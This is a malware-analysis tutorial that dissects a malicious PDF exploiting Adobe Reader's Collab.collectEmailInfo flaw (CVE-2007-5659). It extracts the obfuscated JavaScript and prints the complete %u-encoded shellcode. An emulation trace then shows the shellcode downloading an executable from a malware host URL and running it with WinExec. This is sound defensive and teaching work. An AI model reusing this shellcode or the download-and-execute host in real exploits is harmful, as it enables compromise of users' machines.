Analysis of a malicious PDF
Description
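This page describes the process of analyzing a malicious PDF file, pdf3.pdf, from identifying its objects to emulating the shellcode it carries. Basic information about the file: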
$ file pdf3.pdf
pdf3.pdf: PDF document, version 1.4
$ pdfinfo pdf3.pdf
Error (45188): Illegal character '>'
Error: PDF file is damaged - attempting to reconstruct xref table...
Title:
Keywords:
Author:
Creator: Scribus 1.3.3.13
Producer: Scribus PDF Library 1.3.3.13
CreationDate: Sat Jul 11 08:11:56 2009
ModDate: Sat Jul 11 08:11:56 2009
Tagged: no
Pages: 1
Encrypted: no
Page size: 595.28 x 841.89 pts (A4)
File size: 57348 bytes
Optimized: no
PDF version: 1.4
For our analysis, we will need:
- The REMnux distribution (it contains all the tools listed below)
- pdfid to identify objects in our PDF file
- pdf-parser to list JavaScript objects
- pdfobjflow to map the relationships between the PDF objects
- jsunpack-n to extract the JavaScript contained in the PDF file
- SpiderMonkey to run and de-obfuscate the JavaScript
- Libemu/sctest to emulate the shellcode
- Command-line utilities (sed, unicode2hex-escaped, unicode2raw) to convert our shellcode to various formats
Identify objects
List objects
Let's first identify the objects contained in the PDF file, with pdfid.
remnux@remnux:~/malware$ pdfid pdf3.pdf
PDFiD 0.1.2 pdf3.pdf
PDF Header: %PDF-1.4
obj 40
endobj 40
stream 25
endstream 25
xref 1
trailer 1
startxref 1
/Page 1
/Encrypt 0
/ObjStm 0
/JS 3
/JavaScript 4
/AA 0
/OpenAction 0
/AcroForm 1
/JBIG2Decode 0
/RichMedia 0
/Launch 0
/EmbeddedFile 0
/XFA 0
/Colors > 2^24 0
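To triage many files, the pdfid counts can be read programmatically. The following is a minimal sketch, assuming the output has the "keyword count" layout shown above. The function names `parse_pdfid` and `flag_risky`, and the choice of which keywords count as risky, are illustrative assumptions and not part of pdfid itself.

```python
# Keywords treated as worth a closer look (an assumption made for this sketch).
RISKY = {"/JS", "/JavaScript", "/AA", "/OpenAction", "/AcroForm",
         "/JBIG2Decode", "/RichMedia", "/Launch", "/EmbeddedFile", "/XFA"}

PDFID_OUTPUT = """\
PDFiD 0.1.2 pdf3.pdf
PDF Header: %PDF-1.4
obj 40
endobj 40
stream 25
endstream 25
xref 1
trailer 1
startxref 1
/Page 1
/Encrypt 0
/ObjStm 0
/JS 3
/JavaScript 4
/AA 0
/OpenAction 0
/AcroForm 1
/JBIG2Decode 0
/RichMedia 0
/Launch 0
/EmbeddedFile 0
/XFA 0
/Colors > 2^24 0
"""


def parse_pdfid(text):
    """Map each keyword to its count; lines without a trailing integer are skipped."""
    counts = {}
    for line in text.splitlines():
        parts = line.strip().rsplit(None, 1)
        if len(parts) == 2 and parts[1].isdigit():
            counts[parts[0]] = int(parts[1])
    return counts


def flag_risky(counts):
    """Keep only the risky keywords that occur at least once."""
    return {key: value for key, value in counts.items()
            if key in RISKY and value > 0}


if __name__ == "__main__":
    print(flag_risky(parse_pdfid(PDFID_OUTPUT)))
```

For this file, the flagged keywords are /JS, /JavaScript and /AcroForm, which is why the next step concentrates on the JavaScript objects.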
Search for JavaScript
The pdfid output shows that our PDF file contains JavaScript (/JS 3, /JavaScript 4). Let's list the relevant objects:
remnux@remnux:~/malware$ pdf-parser --search=JavaScript pdf3.pdf
obj 37 0
Type:
Referencing: 34 0 R
<< /S /JavaScript /JS 34 0 R >>

obj 38 0
Type:
Referencing: 35 0 R
<< /S /JavaScript /JS 35 0 R >>

obj 39 0
Type:
Referencing: 36 0 R
<< /S /JavaScript /JS 36 0 R >>

obj 7 0
Type:
Referencing: 40 0 R
<< /JavaScript 40 0 R >>
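The references in this listing can be collected into a small map from each object to the objects it points to. The sketch below assumes the pdf-parser text layout shown above ("obj N G" followed by a "Referencing:" line). The function name `reference_map` is hypothetical, and the approach is a plain regex pass, not how pdf-parser or pdfobjflow work internally.

```python
import re

PDF_PARSER_OUTPUT = """\
obj 37 0
 Type:
 Referencing: 34 0 R
 << /S /JavaScript /JS 34 0 R >>

obj 38 0
 Type:
 Referencing: 35 0 R
 << /S /JavaScript /JS 35 0 R >>

obj 39 0
 Type:
 Referencing: 36 0 R
 << /S /JavaScript /JS 36 0 R >>

obj 7 0
 Type:
 Referencing: 40 0 R
 << /JavaScript 40 0 R >>
"""


def reference_map(text):
    """Return {object number: [referenced object numbers]}."""
    refs = {}
    current = None
    for raw_line in text.splitlines():
        line = raw_line.strip()
        header = re.match(r"obj (\d+) (\d+)$", line)
        if header:
            current = int(header.group(1))
            refs[current] = []
        elif line.startswith("Referencing:") and current is not None:
            # Each reference is written as "<number> <generation> R".
            refs[current] = [int(n) for n in re.findall(r"(\d+) \d+ R", line)]
    return refs


if __name__ == "__main__":
    for source, targets in reference_map(PDF_PARSER_OUTPUT).items():
        print(source, "->", targets)
```

Read this way, objects 37, 38 and 39 are JavaScript actions whose code lives in objects 34, 35 and 36 respectively, while object 7 points to object 40.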
Chained JavaScript objects
Let's see how these objects are linked with pdf-parser and pdfobjflow:
remnux@remnux:~/malware$ pdf-parser pdf3.pdf | pdfobjflow
remnux@remnux:~/malware$ feh pdfobjflow.png
Here is an extract of the output:
Extract JavaScript
We could use pdf-parser to extract the JavaScript code contained in the PDF file. However, since the code appears to be split into three parts (objects 34, 35 and 36), the easiest approach is to use jsunpack-n.
remnux@remnux:~/malware$ jsunpack-extractjs pdf3.pdf
[SNIP]
Found JavaScript in 34 0 (44132 bytes)
children []
tags [["TAGVAL", "Length", "46 "], ["TAGVAL", "Filter", ""], ["ENDTAG", "FlateDecode", ""]]
indata = << /Length 46/Filter /#46#6c#61#74#65#44#65#63#6f#64#65 >>streamx]Y,q+A�8jyl`U�;B~=6Q>UY|ddo�~�>?~z~
Found JavaScript in 35 0 (265 bytes)
children []
tags [["TAGVAL", "Length", "43 "], ["TAGVAL", "Filter", ""], ["ENDTAG", "FlateDecode", ""]]
indata = << /Length 43/Filter /#46#6c#61#74#65#44#65#63#6f#64#65 >>streamxM@E_EfnAfTEr�sF+=Z:K0jvEa[2U{W%iO\-
Found JavaScript in 7 0 (0 bytes)
children [["JavaScript", "40 0"]]
tags [["ENDTAG", "JavaScript", "40 0 R "]]
indata = << /JavaScript 40 0 R >>
Found JavaScript in 36 0 (214 bytes)
children []
tags [["TAGVAL", "Length", "62 "], ["TAGVAL", "Filter", ""], ["ENDTAG", "FlateDecode", ""]]
indata = << /Length 62/Filter /#46#6c#61#74#65#44#65#63#6f#64#65 >>streamx=@_%XuDDH"vH:njO_izi4]�0i2Rj3iShlQY
Wrote JavaScript (45564 bytes -- 953 headers / 44611 code) to file pdf3.pdf.out
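Note that the filter name in each stream dictionary is written as /#46#6c#61#74#65#44#65#63#6f#64#65. PDF names may encode any character as # followed by two hex digits, a common way to hide keywords from naive string searches. A minimal sketch of the decoding follows; the helper name `decode_pdf_name` and the sample JavaScript string are illustrative assumptions, and the zlib round trip only stands in for the real stream data, which is not reproduced here.

```python
import re
import zlib


def decode_pdf_name(name):
    """Replace every #xx escape in a PDF name with the character it encodes."""
    return re.sub(r"#([0-9A-Fa-f]{2})",
                  lambda match: chr(int(match.group(1), 16)),
                  name)


filter_name = decode_pdf_name("/#46#6c#61#74#65#44#65#63#6f#64#65")
print(filter_name)

# FlateDecode streams are zlib-compressed. A stand-in stream is compressed here
# (hypothetical content) to show the inflate step an extractor has to perform.
stand_in_code = b"var payload = unescape('%u9090%u9090');"
stand_in_stream = zlib.compress(stand_in_code)

if filter_name == "/FlateDecode":
    print(zlib.decompress(stand_in_stream).decode("ascii"))
```

The decoded name is /FlateDecode, which matches the tags jsunpack-n reports. The "x" that follows "stream" in each indata line is also consistent with this, since zlib data normally starts with the byte 0x78.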
jsunpack-n confirmed the presence of JavaScript and wrote its output to pdf3.pdf.out. Before we can execute the JavaScript, we must remove the jsunpack headers from that file.
Execute JavaScript
Now, let's skip the first 17 lines of pdf3.pdf.out (the jsunpack headers), save the rest in a file named pdf3.js, and run it with SpiderMonkey:
remnux@remnux:~/malware$ tail -n+18 pdf3.pdf.out > pdf3.js
remnux@remnux:~/malware$ js -f /usr/local/etc/def.js -f pdf3.js > pdf3.out
Let's see what it looks like. As shown in the screenshot below, it is an exploit targeting Collab.collectEmailInfo (a buffer overflow in Adobe Reader, CVE-2007-5659):
Extract shellcode
Let's extract the shellcode contained in the array sIIxQHCE:
Now, let's remove the quotes and commas from the extracted array (saved here as temp.unicode):
remnux@remnux:~/malware$ sed "s/[',]//g" temp.unicode > shellcode.unicode
remnux@remnux:~/malware$ more shellcode.unicode
%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7500%u6470%u7461%u2e65%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u762f%u6f69%u6672%u6f6a%u2d6a%u2e32%u6f63%u2f6d%u2f32%u7075%u6164%u6574%u702e%u7068%u693f%u3d64%u0030%u9000
Analyze shellcode
GetEIP
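The shellcode needs to locate itself in memory, because it cannot know in advance where it will be loaded. It does that with the CALL/POP technique: a call pushes the address of the next instruction onto the stack, pop ebp retrieves that address, and sub ebp, 0xd rewinds it to the start of the shellcode: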
remnux@remnux:~/malware$ cat shellcode.unicode | unicode2hex-escaped > shellcode.hex
remnux@remnux:~/malware$ cat shellcode.hex | sed "s/\\\x//g" | rasm -a x86 -d - | head -n 20
0000 00 push eax
0000 00 push ebx ; cursor+0x3
0000 00 push ecx ; cursor+0x1
0000 00 push edx ; cursor+0x2
0000 00 push esi ; cursor+0x6
0000 00 push edi ; cursor+0x7
0000 00 push ebp ; cursor+0x5
0000 00 pushfd
0000 00 call 0xd ; 1 = 0x0000000d
0000 00 pop ebp
0000 00 sub ebp, 0xd
0000 00 xor eax, eax
0000 00 add eax, [fs:eax+0x30]
0000 00 js 0x25 ; 2 = 0x00000025
0000 00 mov eax, [eax+0xc]
0000 00 mov esi, [eax+0x1c]
0000 00 lodsd
0000 00 mov eax, [eax+0x8]
0000 00 jmp 0x2e ; 3 = 0x0000002e
0000 00 mov eax, [eax+0x34]
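The arithmetic behind the CALL/POP sequence can be checked by hand. The sketch below works on the first 17 bytes of the shellcode (the first eight %u words of shellcode.unicode plus the low byte of the ninth, in little-endian order) and computes the value that ebp holds after sub ebp, 0xd. The function name `recovered_base` and the load address passed to it are hypothetical; this is a manual walk through three instructions, not an emulator.

```python
import struct

# push eax/ebx/ecx/edx/esi/edi/ebp, pushfd, call +0, pop ebp, sub ebp, 0xd
PROLOGUE = bytes.fromhex("50535152565755" "9c" "e800000000" "5d" "83ed0d")


def recovered_base(load_address):
    """Return the value of ebp after the CALL/POP/SUB sequence."""
    call_offset = PROLOGUE.index(0xE8)                      # opcode of call rel32
    rel32 = struct.unpack_from("<i", PROLOGUE, call_offset + 1)[0]
    return_address = load_address + call_offset + 5         # pushed by the call
    call_target = return_address + rel32                    # rel32 is 0 here

    pop_offset = call_target - load_address
    assert PROLOGUE[pop_offset] == 0x5D                     # pop ebp
    ebp = return_address

    assert PROLOGUE[pop_offset + 1:pop_offset + 3] == b"\x83\xed"  # sub ebp, imm8
    ebp -= PROLOGUE[pop_offset + 3]                         # immediate is 0x0d
    return ebp


if __name__ == "__main__":
    base = 0x00417000  # hypothetical load address, chosen for illustration
    print(hex(recovered_base(base)))
```

Whatever load address is supplied, the function returns that same address: the call sits at offset 8 and is 5 bytes long, so the pushed return address is base + 0xd, and subtracting 0xd yields the base. The rest of the shellcode can then address its data as ebp plus a fixed offset.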
Emulate shellcode with libemu
Let's analyze the shellcode with libemu sctest. We first need to convert our shellcode to raw format:
remnux@remnux:~/malware$ cat shellcode.unicode | unicode2raw > shellcode.raw
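For readers without REMnux at hand, the conversion itself is simple: each %uXXXX token is a 16-bit value stored in little-endian order, so %u6547 becomes the bytes 0x47 0x65. The sketch below reimplements that idea in Python; `unicode_to_raw` and `to_hex_escaped` are hypothetical helper names, not the source code of the unicode2raw or unicode2hex-escaped utilities.

```python
import re
import struct


def unicode_to_raw(text):
    """Convert %uXXXX tokens to raw bytes, low byte first."""
    words = re.findall(r"%u([0-9A-Fa-f]{4})", text)
    return b"".join(struct.pack("<H", int(word, 16)) for word in words)


def to_hex_escaped(raw):
    """Render raw bytes as \\xNN escapes."""
    return "".join("\\x{:02x}".format(byte) for byte in raw)


if __name__ == "__main__":
    # Six words taken from the middle of shellcode.unicode.
    sample = "%u6547%u5474%u6d65%u5070%u7461%u4168"
    raw = unicode_to_raw(sample)
    print(raw)
    print(to_hex_escaped(raw[:4]))
```

The sample decodes to the ASCII string GetTempPathA, one of the API names embedded in the shellcode.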
Now we can use sctest:
remnux@remnux:~/malware$ cat shellcode.raw | sctest -Svs 10000000 > sctest-out.txt
remnux@remnux:~/malware$ more sctest-out.txt
verbose = 1
cpu error error accessing 0x00000004 not mapped
stepcount 32150
DWORD GetTempPathA (
     DWORD nBufferLength = 128;
     LPTSTR lpBuffer = 0x0041715e =>
           = "c:\tmp\";
) = 7;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417245 =>
           = "URLMON.DLL";
) = 0x7df20000;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7df20000 =>
         none;
     LPCSTR lpProcName = 0x00417250 =>
           = "URLDownloadToFileA";
) = 0x7df7b0bb;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
         none;
     LPCTSTR szURL = 0x00417278 =>
           = "http://viorfjoj-2.com/2/update.php?id=0";
     LPCTSTR szFileName = 0x0041715e =>
           = "c:\tmp\update.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) = 0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x0041715e =>
           = "c:\tmp\update.exe";
     UINT uCmdShow = 5;
) = 32;
DWORD GetTempPathA (
     DWORD nBufferLength = 128;
     LPTSTR lpBuffer = 0x0041715e =>
           = "c:\tmp\";
) = 7;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417245 =>
           = "URLMON.DLL";
) = 0x7df20000;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7df20000 =>
         none;
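The shellcode first calls GetTempPathA to obtain the temporary directory (c:\tmp\ in the emulated environment), where the downloaded file will be stored. It then loads URLMON.DLL with LoadLibraryA and resolves URLDownloadToFileA with GetProcAddress. That function downloads a file from the Internet (http://viorfjoj-2.com/2/update.php?id=0) and saves it as c:\tmp\update.exe, which is finally executed by WinExec. The trace then starts a second sequence with the same first calls; the excerpt above is cut off before it completes.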
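The indicators in the sctest trace can also be pulled out automatically. The following is a minimal sketch, assuming the trace has the layout of the sctest output above. The `TRACE` sample is abridged from that output, and the helper names `api_calls` and `string_arguments` are hypothetical.

```python
import re

# Abridged copy of the sctest trace (raw string, so backslashes stay literal).
TRACE = r'''
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417245 =>
           = "URLMON.DLL";
) = 0x7df20000;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
         none;
     LPCTSTR szURL = 0x00417278 =>
           = "http://viorfjoj-2.com/2/update.php?id=0";
     LPCTSTR szFileName = 0x0041715e =>
           = "c:\tmp\update.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) = 0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x0041715e =>
           = "c:\tmp\update.exe";
     UINT uCmdShow = 5;
) = 32;
'''


def api_calls(trace):
    """Names of the API functions, in call order."""
    return re.findall(r"(\w+) \($", trace, flags=re.MULTILINE)


def string_arguments(trace):
    """Every string argument shown in the trace."""
    return re.findall(r'= "([^"]*)";', trace)


if __name__ == "__main__":
    print(api_calls(TRACE))
    urls = [s for s in string_arguments(TRACE) if s.startswith("http")]
    print(urls)
```

On this sample, the call list is LoadLibraryA, URLDownloadToFile, WinExec, and the only URL is the download location, which gives a quick set of network and file indicators for the sample.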